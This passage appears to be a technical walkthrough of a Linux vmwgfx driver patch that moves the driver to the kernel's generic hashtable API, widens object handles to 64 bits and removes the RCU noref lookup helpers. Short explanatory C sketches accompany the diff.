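        printf("res=%u bo=%u\n", res, bo);
        obj_put(o);                   /* simulated close from userspace */
        return 0;
    }
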
+diff --git a/drivers/gpu/drm/vmwgfx/Makefile b/drivers/gpu/drm/vmwgfx/Makefile
+index eee73b9aa404b..68e350f410ad3 100644
+--- a/drivers/gpu/drm/vmwgfx/Makefile
++++ b/drivers/gpu/drm/vmwgfx/Makefile
+@@ -1,5 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0
+-vmwgfx-y := vmwgfx_execbuf.o vmwgfx_gmr.o vmwgfx_hashtab.o vmwgfx_kms.o vmwgfx_drv.o \
++vmwgfx-y := vmwgfx_execbuf.o vmwgfx_gmr.o vmwgfx_kms.o vmwgfx_drv.o \
+ 	    vmwgfx_ioctl.o vmwgfx_resource.o vmwgfx_ttm_buffer.o \
+ 	    vmwgfx_cmd.o vmwgfx_irq.o vmwgfx_ldu.o vmwgfx_ttm_glue.o \
+ 	    vmwgfx_overlay.o vmwgfx_gmrid_manager.o vmwgfx_fence.o \
+diff --git a/drivers/gpu/drm/vmwgfx/ttm_object.c b/drivers/gpu/drm/vmwgfx/ttm_object.c
+index 26a55fef1ab50..ddf8373c1d779 100644
+--- a/drivers/gpu/drm/vmwgfx/ttm_object.c
++++ b/drivers/gpu/drm/vmwgfx/ttm_object.c
+@@ -1,7 +1,7 @@
+ /* SPDX-License-Identifier: GPL-2.0 OR MIT */
+ /**************************************************************************
+  *
+- * Copyright (c) 2009-2013 VMware, Inc., Palo Alto, CA., USA
++ * Copyright (c) 2009-2022 VMware, Inc., Palo Alto, CA., USA
+  * All Rights Reserved.
+  *
+  * Permission is hereby granted, free of charge, to any person obtaining a
+@@ -44,16 +44,20 @@
+ 
+ #define pr_fmt(fmt) "[TTM] " fmt
+ 
++#include "ttm_object.h"
++#include "vmwgfx_drv.h"
++
+ #include <linux/list.h>
+ #include <linux/spinlock.h>
+ #include <linux/slab.h>
+ #include <linux/atomic.h>
+ #include <linux/module.h>
+-#include "ttm_object.h"
+-#include "vmwgfx_drv.h"
++#include <linux/hashtable.h>
+ 
+ MODULE_IMPORT_NS(DMA_BUF);
+ 
++#define VMW_TTM_OBJECT_REF_HT_ORDER 10
++
+ /**
+  * struct ttm_object_file
+  *
+@@ -74,16 +78,14 @@ struct ttm_object_file {
+ 	struct ttm_object_device *tdev;
+ 	spinlock_t lock;
+ 	struct list_head ref_list;
+-	struct vmwgfx_open_hash ref_hash;
++	DECLARE_HASHTABLE(ref_hash, VMW_TTM_OBJECT_REF_HT_ORDER);
+ 	struct kref refcount;
+ };
+ 
+ /*
+  * struct ttm_object_device
+  *
+- * @object_lock: lock that protects the object_hash hash table.
+- *
+- * @object_hash: hash table for fast lookup of object global names.
++ * @object_lock: lock that protects idr.
+  *
+  * @object_count: Per device object count.
+  *
+@@ -92,7 +94,6 @@ struct ttm_object_file {
+ 
+ struct ttm_object_device {
+ 	spinlock_t object_lock;
+-	struct vmwgfx_open_hash object_hash;
+ 	atomic_t object_count;
+ 	struct dma_buf_ops ops;
+ 	void (*dmabuf_release)(struct dma_buf *dma_buf);
+@@ -138,6 +139,36 @@ ttm_object_file_ref(struct ttm_object_file *tfile)
+ 	return tfile;
+ }
+ 
++static int ttm_tfile_find_ref_rcu(struct ttm_object_file *tfile,
++				  uint64_t key,
++				  struct vmwgfx_hash_item **p_hash)
++{
++	struct vmwgfx_hash_item *hash;
++
++	hash_for_each_possible_rcu(tfile->ref_hash, hash, head, key) {
++		if (hash->key == key) {
++			*p_hash = hash;
++			return 0;
++		}
++	}
++	return -EINVAL;
++}
++
++static int ttm_tfile_find_ref(struct ttm_object_file *tfile,
++			      uint64_t key,
++			      struct vmwgfx_hash_item **p_hash)
++{
++	struct vmwgfx_hash_item *hash;
++
++	hash_for_each_possible(tfile->ref_hash, hash, head, key) {
++		if (hash->key == key) {
++			*p_hash = hash;
++			return 0;
++		}
++	}
++	return -EINVAL;
++}
++
+ static void ttm_object_file_destroy(struct kref *kref)
+ {
+ 	struct ttm_object_file *tfile =
+@@ -223,64 +254,29 @@ void ttm_base_object_unref(struct ttm_base_object **p_base)
+ 	kref_put(&base->refcount, ttm_release_base);
+ }
+ 
+-/**
+- * ttm_base_object_noref_lookup - look up a base object without reference
+- * @tfile: The struct ttm_object_file the object is registered with.
+- * @key: The object handle.
+- *
+- * This function looks up a ttm base object and returns a pointer to it
+- * without refcounting the pointer. The returned pointer is only valid
+- * until ttm_base_object_noref_release() is called, and the object
+- * pointed to by the returned pointer may be doomed. Any persistent usage
+- * of the object requires a refcount to be taken using kref_get_unless_zero().
+- * Iff this function returns successfully it needs to be paired with
+- * ttm_base_object_noref_release() and no sleeping- or scheduling functions
+- * may be called in between these function calls.
+- *
+- * Return: A pointer to the object if successful or NULL otherwise.
+- */
+-struct ttm_base_object *
+-ttm_base_object_noref_lookup(struct ttm_object_file *tfile, uint32_t key)
+-{
+-	struct vmwgfx_hash_item *hash;
+-	struct vmwgfx_open_hash *ht = &tfile->ref_hash;
+-	int ret;
+-
+-	rcu_read_lock();
+-	ret = vmwgfx_ht_find_item_rcu(ht, key, &hash);
+-	if (ret) {
+-		rcu_read_unlock();
+-		return NULL;
+-	}
+-
+-	__release(RCU);
+-	return drm_hash_entry(hash, struct ttm_ref_object, hash)->obj;
+-}
+-EXPORT_SYMBOL(ttm_base_object_noref_lookup);
+-
+ struct ttm_base_object *ttm_base_object_lookup(struct ttm_object_file *tfile,
+-					       uint32_t key)
++					       uint64_t key)
+ {
+ 	struct ttm_base_object *base = NULL;
+ 	struct vmwgfx_hash_item *hash;
+-	struct vmwgfx_open_hash *ht = &tfile->ref_hash;
+ 	int ret;
+ 
+-	rcu_read_lock();
+-	ret = vmwgfx_ht_find_item_rcu(ht, key, &hash);
++	spin_lock(&tfile->lock);
++	ret = ttm_tfile_find_ref(tfile, key, &hash);
+ 
+ 	if (likely(ret == 0)) {
+-		base = drm_hash_entry(hash, struct ttm_ref_object, hash)->obj;
++		base = hlist_entry(hash, struct ttm_ref_object, hash)->obj;
+ 		if (!kref_get_unless_zero(&base->refcount))
+ 			base = NULL;
+ 	}
+-	rcu_read_unlock();
++	spin_unlock(&tfile->lock);
++
+ 
+ 	return base;
+ }
+ 
+ struct ttm_base_object *
+-ttm_base_object_lookup_for_ref(struct ttm_object_device *tdev, uint32_t key)
++ttm_base_object_lookup_for_ref(struct ttm_object_device *tdev, uint64_t key)
+ {
+ 	struct ttm_base_object *base;
+ 
+@@ -299,7 +295,6 @@ int ttm_ref_object_add(struct ttm_object_file *tfile,
+ 		       bool *existed,
+ 		       bool require_existed)
+ {
+-	struct vmwgfx_open_hash *ht = &tfile->ref_hash;
+ 	struct ttm_ref_object *ref;
+ 	struct vmwgfx_hash_item *hash;
+ 	int ret = -EINVAL;
+@@ -312,10 +307,10 @@ int ttm_ref_object_add(struct ttm_object_file *tfile,
+ 
+ 	while (ret == -EINVAL) {
+ 		rcu_read_lock();
+-		ret = vmwgfx_ht_find_item_rcu(ht, base->handle, &hash);
++		ret = ttm_tfile_find_ref_rcu(tfile, base->handle, &hash);
+ 
+ 		if (ret == 0) {
+-			ref = drm_hash_entry(hash, struct ttm_ref_object, hash);
++			ref = hlist_entry(hash, struct ttm_ref_object, hash);
+ 			if (kref_get_unless_zero(&ref->kref)) {
+ 				rcu_read_unlock();
+ 				break;
+@@ -337,21 +332,14 @@ int ttm_ref_object_add(struct ttm_object_file *tfile,
+ 		kref_init(&ref->kref);
+ 
+ 		spin_lock(&tfile->lock);
+-		ret = vmwgfx_ht_insert_item_rcu(ht, &ref->hash);
+-
+-		if (likely(ret == 0)) {
+-			list_add_tail(&ref->head, &tfile->ref_list);
+-			kref_get(&base->refcount);
+-			spin_unlock(&tfile->lock);
+-			if (existed != NULL)
+-				*existed = false;
+-			break;
+-		}
++		hash_add_rcu(tfile->ref_hash, &ref->hash.head, ref->hash.key);
++		ret = 0;
+ 
++		list_add_tail(&ref->head, &tfile->ref_list);
++		kref_get(&base->refcount);
+ 		spin_unlock(&tfile->lock);
+-		BUG_ON(ret != -EINVAL);
+-
+-		kfree(ref);
++		if (existed != NULL)
++			*existed = false;
+ 	}
+ 
+ 	return ret;
+@@ -363,10 +351,8 @@ ttm_ref_object_release(struct kref *kref)
+ 	struct ttm_ref_object *ref =
+ 	    container_of(kref, struct ttm_ref_object, kref);
+ 	struct ttm_object_file *tfile = ref->tfile;
+-	struct vmwgfx_open_hash *ht;
+ 
+-	ht = &tfile->ref_hash;
+-	(void)vmwgfx_ht_remove_item_rcu(ht, &ref->hash);
++	hash_del_rcu(&ref->hash.head);
+ 	list_del(&ref->head);
+ 	spin_unlock(&tfile->lock);
+ 
+@@ -378,18 +364,17 @@ ttm_ref_object_release(struct kref *kref)
+ int ttm_ref_object_base_unref(struct ttm_object_file *tfile,
+ 			      unsigned long key)
+ {
+-	struct vmwgfx_open_hash *ht = &tfile->ref_hash;
+ 	struct ttm_ref_object *ref;
+ 	struct vmwgfx_hash_item *hash;
+ 	int ret;
+ 
+ 	spin_lock(&tfile->lock);
+-	ret = vmwgfx_ht_find_item(ht, key, &hash);
++	ret = ttm_tfile_find_ref(tfile, key, &hash);
+ 	if (unlikely(ret != 0)) {
+ 		spin_unlock(&tfile->lock);
+ 		return -EINVAL;
+ 	}
+-	ref = drm_hash_entry(hash, struct ttm_ref_object, hash);
++	ref = hlist_entry(hash, struct ttm_ref_object, hash);
+ 	kref_put(&ref->kref, ttm_ref_object_release);
+ 	spin_unlock(&tfile->lock);
+ 	return 0;
+@@ -416,16 +401,13 @@ void ttm_object_file_release(struct ttm_object_file **p_tfile)
+ 	}
+ 
+ 	spin_unlock(&tfile->lock);
+-	vmwgfx_ht_remove(&tfile->ref_hash);
+ 
+ 	ttm_object_file_unref(&tfile);
+ }
+ 
+-struct ttm_object_file *ttm_object_file_init(struct ttm_object_device *tdev,
+-					     unsigned int hash_order)
++struct ttm_object_file *ttm_object_file_init(struct ttm_object_device *tdev)
+ {
+ 	struct ttm_object_file *tfile = kmalloc(sizeof(*tfile), GFP_KERNEL);
+-	int ret;
+ 
+ 	if (unlikely(tfile == NULL))
+ 		return NULL;
+@@ -435,34 +417,21 @@ struct ttm_object_file *ttm_object_file_init(struct ttm_object_device *tdev,
+ 	kref_init(&tfile->refcount);
+ 	INIT_LIST_HEAD(&tfile->ref_list);
+ 
+-	ret = vmwgfx_ht_create(&tfile->ref_hash, hash_order);
+-	if (ret)
+-		goto out_err;
++	hash_init(tfile->ref_hash);
+ 
+ 	return tfile;
+-out_err:
+-	vmwgfx_ht_remove(&tfile->ref_hash);
+-
+-	kfree(tfile);
+-
+-	return NULL;
+ }
+ 
+ struct ttm_object_device *
+-ttm_object_device_init(unsigned int hash_order,
+-		       const struct dma_buf_ops *ops)
++ttm_object_device_init(const struct dma_buf_ops *ops)
+ {
+ 	struct ttm_object_device *tdev = kmalloc(sizeof(*tdev), GFP_KERNEL);
+-	int ret;
+ 
+ 	if (unlikely(tdev == NULL))
+ 		return NULL;
+ 
+ 	spin_lock_init(&tdev->object_lock);
+ 	atomic_set(&tdev->object_count, 0);
+-	ret = vmwgfx_ht_create(&tdev->object_hash, hash_order);
+-	if (ret != 0)
+-		goto out_no_object_hash;
+ 
+ 	/*
+ 	 * Our base is at VMWGFX_NUM_MOB + 1 because we want to create
+@@ -477,10 +446,6 @@ ttm_object_device_init(unsigned int hash_order,
+ 	tdev->dmabuf_release = tdev->ops.release;
+ 	tdev->ops.release = ttm_prime_dmabuf_release;
+ 	return tdev;
+-
+-out_no_object_hash:
+-	kfree(tdev);
+-	return NULL;
+ }
+ 
+ void ttm_object_device_release(struct ttm_object_device **p_tdev)
+@@ -491,7 +456,6 @@ void ttm_object_device_release(struct ttm_object_device **p_tdev)
+ 
+ 	WARN_ON_ONCE(!idr_is_empty(&tdev->idr));
+ 	idr_destroy(&tdev->idr);
+-	vmwgfx_ht_remove(&tdev->object_hash);
+ 
+ 	kfree(tdev);
+ }
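
The ttm_object.c conversion above replaces the driver-private vmwgfx_open_hash with the generic <linux/hashtable.h> API: DECLARE_HASHTABLE() embeds 2^order bucket heads directly in the containing structure, hash_init() cannot fail (which is why the out_err unwinding disappears), and a lookup is a single-bucket walk with hash_for_each_possible(_rcu)() comparing stored keys, exactly as the new ttm_tfile_find_ref() helpers do. A condensed kernel-style sketch of the pattern (structure names are illustrative):

    #include <linux/hashtable.h>

    #define REF_HT_ORDER 10                 /* 1024 buckets, sized at compile time */

    struct ref_item {
        struct hlist_node head;
        unsigned long key;
    };

    struct file_ctx {
        DECLARE_HASHTABLE(ref_hash, REF_HT_ORDER);
    };

    static void ctx_init(struct file_ctx *ctx)
    {
        hash_init(ctx->ref_hash);           /* no allocation, cannot fail */
    }

    static void ctx_add(struct file_ctx *ctx, struct ref_item *it)
    {
        hash_add_rcu(ctx->ref_hash, &it->head, it->key);
    }

    static struct ref_item *ctx_find(struct file_ctx *ctx, unsigned long key)
    {
        struct ref_item *it;

        /* Walks only the bucket that key hashes to; distinct keys can
         * collide in one bucket, hence the explicit comparison. */
        hash_for_each_possible_rcu(ctx->ref_hash, it, head, key)
            if (it->key == key)
                return it;
        return NULL;
    }

Removal is hash_del_rcu(&it->head), matching ttm_ref_object_release() above.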
+diff --git a/drivers/gpu/drm/vmwgfx/ttm_object.h b/drivers/gpu/drm/vmwgfx/ttm_object.h
+index 1a2fa0f83f5f9..8098a3846bae3 100644
+--- a/drivers/gpu/drm/vmwgfx/ttm_object.h
++++ b/drivers/gpu/drm/vmwgfx/ttm_object.h
+@@ -1,6 +1,6 @@
+ /**************************************************************************
+  *
+- * Copyright (c) 2006-2009 VMware, Inc., Palo Alto, CA., USA
++ * Copyright (c) 2006-2022 VMware, Inc., Palo Alto, CA., USA
+  * All Rights Reserved.
+  *
+  * Permission is hereby granted, free of charge, to any person obtaining a
+@@ -42,8 +42,6 @@
+ #include <linux/list.h>
+ #include <linux/rcupdate.h>
+ 
+-#include "vmwgfx_hashtab.h"
+-
+ /**
+  * enum ttm_object_type
+  *
+@@ -104,7 +102,7 @@ struct ttm_base_object {
+ 	struct ttm_object_file *tfile;
+ 	struct kref refcount;
+ 	void (*refcount_release) (struct ttm_base_object **base);
+-	u32 handle;
++	u64 handle;
+ 	enum ttm_object_type object_type;
+ 	u32 shareable;
+ };
+@@ -164,7 +162,7 @@ extern int ttm_base_object_init(struct ttm_object_file *tfile,
+  */
+ 
+ extern struct ttm_base_object *ttm_base_object_lookup(struct ttm_object_file
+-						      *tfile, uint32_t key);
++						      *tfile, uint64_t key);
+ 
+ /**
+  * ttm_base_object_lookup_for_ref
+@@ -178,7 +176,7 @@ extern struct ttm_base_object *ttm_base_object_lookup(struct ttm_object_file
+  */
+ 
+ extern struct ttm_base_object *
+-ttm_base_object_lookup_for_ref(struct ttm_object_device *tdev, uint32_t key);
++ttm_base_object_lookup_for_ref(struct ttm_object_device *tdev, uint64_t key);
+ 
+ /**
+  * ttm_base_object_unref
+@@ -237,14 +235,12 @@ extern int ttm_ref_object_base_unref(struct ttm_object_file *tfile,
+  * ttm_object_file_init - initialize a struct ttm_object file
+  *
+  * @tdev: A struct ttm_object device this file is initialized on.
+- * @hash_order: Order of the hash table used to hold the reference objects.
+  *
+  * This is typically called by the file_ops::open function.
+  */
+ 
+ extern struct ttm_object_file *ttm_object_file_init(struct ttm_object_device
+-						    *tdev,
+-						    unsigned int hash_order);
++						    *tdev);
+ 
+ /**
+  * ttm_object_file_release - release data held by a ttm_object_file
+@@ -262,7 +258,6 @@ extern void ttm_object_file_release(struct ttm_object_file **p_tfile);
+ /**
+  * ttm_object device init - initialize a struct ttm_object_device
+  *
+- * @hash_order: Order of hash table used to hash the base objects.
+  * @ops: DMA buf ops for prime objects of this device.
+  *
+  * This function is typically called on device initialization to prepare
+@@ -270,8 +265,7 @@ extern void ttm_object_file_release(struct ttm_object_file **p_tfile);
+  */
+ 
+ extern struct ttm_object_device *
+-ttm_object_device_init(unsigned int hash_order,
+-		       const struct dma_buf_ops *ops);
++ttm_object_device_init(const struct dma_buf_ops *ops);
+ 
+ /**
+  * ttm_object_device_release - release data held by a ttm_object_device
+@@ -313,18 +307,4 @@ extern int ttm_prime_handle_to_fd(struct ttm_object_file *tfile,
+ #define ttm_prime_object_kfree(__obj, __prime)		\
+ 	kfree_rcu(__obj, __prime.base.rhead)
+ 
+-struct ttm_base_object *
+-ttm_base_object_noref_lookup(struct ttm_object_file *tfile, uint32_t key);
+-
+-/**
+- * ttm_base_object_noref_release - release a base object pointer looked up
+- * without reference
+- *
+- * Releases a base object pointer looked up with ttm_base_object_noref_lookup().
+- */
+-static inline void ttm_base_object_noref_release(void)
+-{
+-	__acquire(RCU);
+-	rcu_read_unlock();
+-}
+ #endif
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_bo.c b/drivers/gpu/drm/vmwgfx/vmwgfx_bo.c
+index 822251aaab0a1..973a0a52462e9 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_bo.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_bo.c
+@@ -715,44 +715,6 @@ int vmw_user_bo_lookup(struct drm_file *filp,
+ 	return 0;
+ }
+ 
+-/**
+- * vmw_user_bo_noref_lookup - Look up a vmw user buffer object without reference
+- * @filp: The TTM object file the handle is registered with.
+- * @handle: The user buffer object handle.
+- *
+- * This function looks up a struct vmw_bo and returns a pointer to the
+- * struct vmw_buffer_object it derives from without refcounting the pointer.
+- * The returned pointer is only valid until vmw_user_bo_noref_release() is
+- * called, and the object pointed to by the returned pointer may be doomed.
+- * Any persistent usage of the object requires a refcount to be taken using
+- * ttm_bo_reference_unless_doomed(). Iff this function returns successfully it
+- * needs to be paired with vmw_user_bo_noref_release() and no sleeping-
+- * or scheduling functions may be called in between these function calls.
+- *
+- * Return: A struct vmw_buffer_object pointer if successful or negative
+- * error pointer on failure.
+- */
+-struct vmw_buffer_object *
+-vmw_user_bo_noref_lookup(struct drm_file *filp, u32 handle)
+-{
+-	struct vmw_buffer_object *vmw_bo;
+-	struct ttm_buffer_object *bo;
+-	struct drm_gem_object *gobj = drm_gem_object_lookup(filp, handle);
+-
+-	if (!gobj) {
+-		DRM_ERROR("Invalid buffer object handle 0x%08lx.\n",
+-			  (unsigned long)handle);
+-		return ERR_PTR(-ESRCH);
+-	}
+-	vmw_bo = gem_to_vmw_bo(gobj);
+-	bo = ttm_bo_get_unless_zero(&vmw_bo->base);
+-	vmw_bo = vmw_buffer_object(bo);
+-	drm_gem_object_put(gobj);
+-
+-	return vmw_bo;
+-}
+-
+-
+ /**
+  * vmw_bo_fence_single - Utility function to fence a single TTM buffer
+  *                       object without unreserving it.
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_cmdbuf_res.c b/drivers/gpu/drm/vmwgfx/vmwgfx_cmdbuf_res.c
+index 82ef58ccdd428..47bc0b411055f 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_cmdbuf_res.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_cmdbuf_res.c
+@@ -1,7 +1,7 @@
+ // SPDX-License-Identifier: GPL-2.0 OR MIT
+ /**************************************************************************
+  *
+- * Copyright 2014-2015 VMware, Inc., Palo Alto, CA., USA
++ * Copyright 2014-2022 VMware, Inc., Palo Alto, CA., USA
+  *
+  * Permission is hereby granted, free of charge, to any person obtaining a
+  * copy of this software and associated documentation files (the
+@@ -28,6 +28,8 @@
+ #include "vmwgfx_drv.h"
+ #include "vmwgfx_resource_priv.h"
+ 
++#include <linux/hashtable.h>
++
+ #define VMW_CMDBUF_RES_MAN_HT_ORDER 12
+ 
+ /**
+@@ -59,7 +61,7 @@ struct vmw_cmdbuf_res {
+  * @resources and @list are protected by the cmdbuf mutex for now.
+  */
+ struct vmw_cmdbuf_res_manager {
+-	struct vmwgfx_open_hash resources;
++	DECLARE_HASHTABLE(resources, VMW_CMDBUF_RES_MAN_HT_ORDER);
+ 	struct list_head list;
+ 	struct vmw_private *dev_priv;
+ };
+@@ -82,14 +84,13 @@ vmw_cmdbuf_res_lookup(struct vmw_cmdbuf_res_manager *man,
+ 		      u32 user_key)
+ {
+ 	struct vmwgfx_hash_item *hash;
+-	int ret;
+ 	unsigned long key = user_key | (res_type << 24);
+ 
+-	ret = vmwgfx_ht_find_item(&man->resources, key, &hash);
+-	if (unlikely(ret != 0))
+-		return ERR_PTR(ret);
+-
+-	return drm_hash_entry(hash, struct vmw_cmdbuf_res, hash)->res;
++	hash_for_each_possible_rcu(man->resources, hash, head, key) {
++		if (hash->key == key)
++			return hlist_entry(hash, struct vmw_cmdbuf_res, hash)->res;
++	}
++	return ERR_PTR(-EINVAL);
+ }
+ 
+ /**
+@@ -105,7 +106,7 @@ static void vmw_cmdbuf_res_free(struct vmw_cmdbuf_res_manager *man,
+ 				struct vmw_cmdbuf_res *entry)
+ {
+ 	list_del(&entry->head);
+-	WARN_ON(vmwgfx_ht_remove_item(&man->resources, &entry->hash));
++	hash_del_rcu(&entry->hash.head);
+ 	vmw_resource_unreference(&entry->res);
+ 	kfree(entry);
+ }
+@@ -159,7 +160,6 @@ void vmw_cmdbuf_res_commit(struct list_head *list)
+ void vmw_cmdbuf_res_revert(struct list_head *list)
+ {
+ 	struct vmw_cmdbuf_res *entry, *next;
+-	int ret;
+ 
+ 	list_for_each_entry_safe(entry, next, list, head) {
+ 		switch (entry->state) {
+@@ -167,8 +167,8 @@ void vmw_cmdbuf_res_revert(struct list_head *list)
+ 			vmw_cmdbuf_res_free(entry->man, entry);
+ 			break;
+ 		case VMW_CMDBUF_RES_DEL:
+-			ret = vmwgfx_ht_insert_item(&entry->man->resources, &entry->hash);
+-			BUG_ON(ret);
++			hash_add_rcu(entry->man->resources, &entry->hash.head,
++						entry->hash.key);
+ 			list_move_tail(&entry->head, &entry->man->list);
+ 			entry->state = VMW_CMDBUF_RES_COMMITTED;
+ 			break;
+@@ -199,26 +199,20 @@ int vmw_cmdbuf_res_add(struct vmw_cmdbuf_res_manager *man,
+ 		       struct list_head *list)
+ {
+ 	struct vmw_cmdbuf_res *cres;
+-	int ret;
+ 
+ 	cres = kzalloc(sizeof(*cres), GFP_KERNEL);
+ 	if (unlikely(!cres))
+ 		return -ENOMEM;
+ 
+ 	cres->hash.key = user_key | (res_type << 24);
+-	ret = vmwgfx_ht_insert_item(&man->resources, &cres->hash);
+-	if (unlikely(ret != 0)) {
+-		kfree(cres);
+-		goto out_invalid_key;
+-	}
++	hash_add_rcu(man->resources, &cres->hash.head, cres->hash.key);
+ 
+ 	cres->state = VMW_CMDBUF_RES_ADD;
+ 	cres->res = vmw_resource_reference(res);
+ 	cres->man = man;
+ 	list_add_tail(&cres->head, list);
+ 
+-out_invalid_key:
+-	return ret;
++	return 0;
+ }
+ 
+ /**
+@@ -243,24 +237,26 @@ int vmw_cmdbuf_res_remove(struct vmw_cmdbuf_res_manager *man,
+ 			  struct list_head *list,
+ 			  struct vmw_resource **res_p)
+ {
+-	struct vmw_cmdbuf_res *entry;
++	struct vmw_cmdbuf_res *entry = NULL;
+ 	struct vmwgfx_hash_item *hash;
+-	int ret;
++	unsigned long key = user_key | (res_type << 24);
+ 
+-	ret = vmwgfx_ht_find_item(&man->resources, user_key | (res_type << 24),
+-			       &hash);
+-	if (likely(ret != 0))
++	hash_for_each_possible_rcu(man->resources, hash, head, key) {
++		if (hash->key == key) {
++			entry = hlist_entry(hash, struct vmw_cmdbuf_res, hash);
++			break;
++		}
++	}
++	if (unlikely(!entry))
+ 		return -EINVAL;
+ 
+-	entry = drm_hash_entry(hash, struct vmw_cmdbuf_res, hash);
+-
+ 	switch (entry->state) {
+ 	case VMW_CMDBUF_RES_ADD:
+ 		vmw_cmdbuf_res_free(man, entry);
+ 		*res_p = NULL;
+ 		break;
+ 	case VMW_CMDBUF_RES_COMMITTED:
+-		(void) vmwgfx_ht_remove_item(&man->resources, &entry->hash);
++		hash_del_rcu(&entry->hash.head);
+ 		list_del(&entry->head);
+ 		entry->state = VMW_CMDBUF_RES_DEL;
+ 		list_add_tail(&entry->head, list);
+@@ -287,7 +283,6 @@ struct vmw_cmdbuf_res_manager *
+ vmw_cmdbuf_res_man_create(struct vmw_private *dev_priv)
+ {
+ 	struct vmw_cmdbuf_res_manager *man;
+-	int ret;
+ 
+ 	man = kzalloc(sizeof(*man), GFP_KERNEL);
+ 	if (!man)
+@@ -295,12 +290,8 @@ vmw_cmdbuf_res_man_create(struct vmw_private *dev_priv)
+ 
+ 	man->dev_priv = dev_priv;
+ 	INIT_LIST_HEAD(&man->list);
+-	ret = vmwgfx_ht_create(&man->resources, VMW_CMDBUF_RES_MAN_HT_ORDER);
+-	if (ret == 0)
+-		return man;
+-
+-	kfree(man);
+-	return ERR_PTR(ret);
++	hash_init(man->resources);
++	return man;
+ }
+ 
+ /**
+@@ -320,7 +311,6 @@ void vmw_cmdbuf_res_man_destroy(struct vmw_cmdbuf_res_manager *man)
+ 	list_for_each_entry_safe(entry, next, &man->list, head)
+ 		vmw_cmdbuf_res_free(man, entry);
+ 
+-	vmwgfx_ht_remove(&man->resources);
+ 	kfree(man);
+ }
+ 
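
vmw_cmdbuf_res_lookup() keys one table for all resource types by packing the type into the upper bits of the user key, user_key | (res_type << 24), so a lookup stays a single bucket walk. A small standalone illustration of that packing (the mask on user_key is added here for clarity; the driver relies on user keys fitting in 24 bits):

    #include <stdio.h>

    enum res_type { RES_TYPE_SHADER = 1, RES_TYPE_VIEW = 2 };

    /* Low 24 bits: user key; upper bits: resource type. */
    static unsigned long pack_key(unsigned int user_key, enum res_type type)
    {
        return (user_key & 0xffffffUL) | ((unsigned long)type << 24);
    }

    int main(void)
    {
        unsigned long key = pack_key(0x1234, RES_TYPE_SHADER);

        printf("key=0x%lx type=%lu user_key=0x%lx\n",
               key, key >> 24, key & 0xffffffUL);
        return 0;
    }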
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_drv.c b/drivers/gpu/drm/vmwgfx/vmwgfx_drv.c
+index d7bd5eb1d3acd..b909a3ce9af3c 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_drv.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_drv.c
+@@ -25,10 +25,13 @@
+  *
+  **************************************************************************/
+ 
+-#include <linux/dma-mapping.h>
+-#include <linux/module.h>
+-#include <linux/pci.h>
+-#include <linux/cc_platform.h>
++
++#include "vmwgfx_drv.h"
++
++#include "vmwgfx_devcaps.h"
++#include "vmwgfx_mksstat.h"
++#include "vmwgfx_binding.h"
++#include "ttm_object.h"
+ 
+ #include <drm/drm_aperture.h>
+ #include <drm/drm_drv.h>
+@@ -41,11 +44,11 @@
+ #include <drm/ttm/ttm_placement.h>
+ #include <generated/utsrelease.h>
+ 
+-#include "ttm_object.h"
+-#include "vmwgfx_binding.h"
+-#include "vmwgfx_devcaps.h"
+-#include "vmwgfx_drv.h"
+-#include "vmwgfx_mksstat.h"
++#include <linux/cc_platform.h>
++#include <linux/dma-mapping.h>
++#include <linux/module.h>
++#include <linux/pci.h>
++#include <linux/version.h>
+ 
+ #define VMWGFX_DRIVER_DESC "Linux drm driver for VMware graphics devices"
+ 
+@@ -806,6 +809,43 @@ static int vmw_detect_version(struct vmw_private *dev)
+ 	return 0;
+ }
+ 
++static void vmw_write_driver_id(struct vmw_private *dev)
++{
++	if ((dev->capabilities2 & SVGA_CAP2_DX2) != 0) {
++		vmw_write(dev,  SVGA_REG_GUEST_DRIVER_ID,
++			  SVGA_REG_GUEST_DRIVER_ID_LINUX);
++
++		vmw_write(dev, SVGA_REG_GUEST_DRIVER_VERSION1,
++			  LINUX_VERSION_MAJOR << 24 |
++			  LINUX_VERSION_PATCHLEVEL << 16 |
++			  LINUX_VERSION_SUBLEVEL);
++		vmw_write(dev, SVGA_REG_GUEST_DRIVER_VERSION2,
++			  VMWGFX_DRIVER_MAJOR << 24 |
++			  VMWGFX_DRIVER_MINOR << 16 |
++			  VMWGFX_DRIVER_PATCHLEVEL);
++		vmw_write(dev, SVGA_REG_GUEST_DRIVER_VERSION3, 0);
++
++		vmw_write(dev, SVGA_REG_GUEST_DRIVER_ID,
++			  SVGA_REG_GUEST_DRIVER_ID_SUBMIT);
++	}
++}
++
++static void vmw_sw_context_init(struct vmw_private *dev_priv)
++{
++	struct vmw_sw_context *sw_context = &dev_priv->ctx;
++
++	hash_init(sw_context->res_ht);
++}
++
++static void vmw_sw_context_fini(struct vmw_private *dev_priv)
++{
++	struct vmw_sw_context *sw_context = &dev_priv->ctx;
++
++	vfree(sw_context->cmd_bounce);
++	if (sw_context->staged_bindings)
++		vmw_binding_state_free(sw_context->staged_bindings);
++}
++
+ static int vmw_driver_load(struct vmw_private *dev_priv, u32 pci_id)
+ {
+ 	int ret;
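
vmw_write_driver_id() above reports the guest driver to the host by packing a version triple into a single 32-bit register: the major number in the top byte, the patchlevel in the next byte, and the sublevel in the low 16 bits. A quick check of the encoding:

    #include <stdio.h>

    int main(void)
    {
        /* Kernel 6.1.65 as written to SVGA_REG_GUEST_DRIVER_VERSION1:
         * (6 << 24) | (1 << 16) | 65 = 0x06010041 */
        unsigned int major = 6, patchlevel = 1, sublevel = 65;
        unsigned int packed = major << 24 | patchlevel << 16 | sublevel;

        printf("0x%08x\n", packed);  /* prints 0x06010041 */
        return 0;
    }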
+@@ -815,6 +855,8 @@ static int vmw_driver_load(struct vmw_private *dev_priv, u32 pci_id)
+ 
+ 	dev_priv->drm.dev_private = dev_priv;
+ 
++	vmw_sw_context_init(dev_priv);
++
+ 	mutex_init(&dev_priv->cmdbuf_mutex);
+ 	mutex_init(&dev_priv->binding_mutex);
+ 	spin_lock_init(&dev_priv->resource_lock);
